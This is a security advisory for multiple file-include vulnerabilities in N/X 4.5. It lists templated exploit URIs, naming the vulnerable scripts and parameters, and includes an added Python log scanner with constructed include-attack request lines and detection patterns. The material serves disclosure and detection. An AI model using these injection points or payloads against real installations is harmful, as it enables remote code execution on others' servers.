N/X Multiple Input Validation Vulnerabilities
BID:39571
Info
| Bugtraq ID: | 39571 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 19 2010 12:00AM |
| Updated: | Apr 19 2010 12:00AM |
| Credit: | eidelweiss |
| Vulnerable: | Sven Weih N/X 4.5 |
| Not Vulnerable: | |
Discussion
N/X is prone to multiple remote file-include vulnerabilities and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these issues using directory-traversal strings to execute local script code in the context of the application, or to execute arbitrary code within the context of the webserver.
N/X 4.5 is vulnerable; other versions may also be affected.
Exploit / POC
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[NX_PATH]/www/text.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/article.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/article_overview.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/sitemap.php?path=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/pagelayout.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/nxheader.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/cms/api/xml/lib.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/cms/api/parser/lib.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/cms/api/cms/lib.inc.php?c[path]=[inj3ct0rsh3ll]
http://www.example.com/[NX_PATH]/www/nxheader.inc.php?page= [LFI]%00
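
An added example, not part of the original advisory or of N/X's code: a check over web server access logs that flags requests to the scripts listed above when their `path`, `c[path]` or `page` parameter carries a URL scheme, a traversal sequence or a null byte. The log lines, hosts and the `/nx/` install prefix are constructed for illustration, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths and parameter names copied from the advisory's example URIs.
SCRIPTS = (
    "/www/text.php", "/www/article.php", "/www/article_overview.php",
    "/www/sitemap.php", "/www/pagelayout.inc.php", "/www/nxheader.inc.php",
    "/cms/api/xml/lib.inc.php", "/cms/api/parser/lib.inc.php",
    "/cms/api/cms/lib.inc.php",
)
PARAMS = {"path", "c[path]", "page"}

# Value patterns tied to file inclusion: URL scheme (remote), traversal and NUL (local).
CHECKS = (
    ("remote-scheme", re.compile(r"[a-z][a-z0-9+.-]*://", re.I)),
    ("traversal", re.compile(r"\.\.[/\\]")),
    ("null-byte", re.compile(r"\x00")),
)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format); hosts and paths are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Apr/2010:10:00:01 +0000] "GET /nx/www/article.php?page=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Apr/2010:10:02:13 +0000] "GET /nx/www/text.php?path=http://files.example.net/a.txt HTTP/1.1" 200 311',
    '198.51.100.7 - - [19/Apr/2010:10:02:40 +0000] "GET /nx/www/nxheader.inc.php?page=..%2F..%2Fsome%2Ffile%00 HTTP/1.1" 200 97',
    '198.51.100.7 - - [19/Apr/2010:10:03:02 +0000] "GET /nx/cms/api/xml/lib.inc.php?c%5Bpath%5D=ftp://files.example.net/ HTTP/1.1" 200 0',
]


def flag_target(target):
    """Return sorted reasons why a request target looks like an include attempt."""
    parts = urlsplit(target)
    if not parts.path.endswith(SCRIPTS):
        return []
    reasons = set()
    # parse_qsl percent-decodes names and values, so c%5Bpath%5D, %2F and %00 are matched decoded.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in PARAMS:
            reasons.update(label for label, rx in CHECKS if rx.search(value))
    return sorted(reasons)


def scan(log_lines):
    """Return [(line_number, reasons)] for log lines that hit the listed scripts."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match and (reasons := flag_target(match.group(1))):
            hits.append((number, reasons))
    return hits
```

`scan(SAMPLE_LOG)` flags lines 2 to 4 and leaves the ordinary `page=12` request alone. Values that are percent-encoded twice are decoded only once here, so they need a second pass if the log source preserves them.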
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- N/X Web Content Management System Homepage (Sven Weih)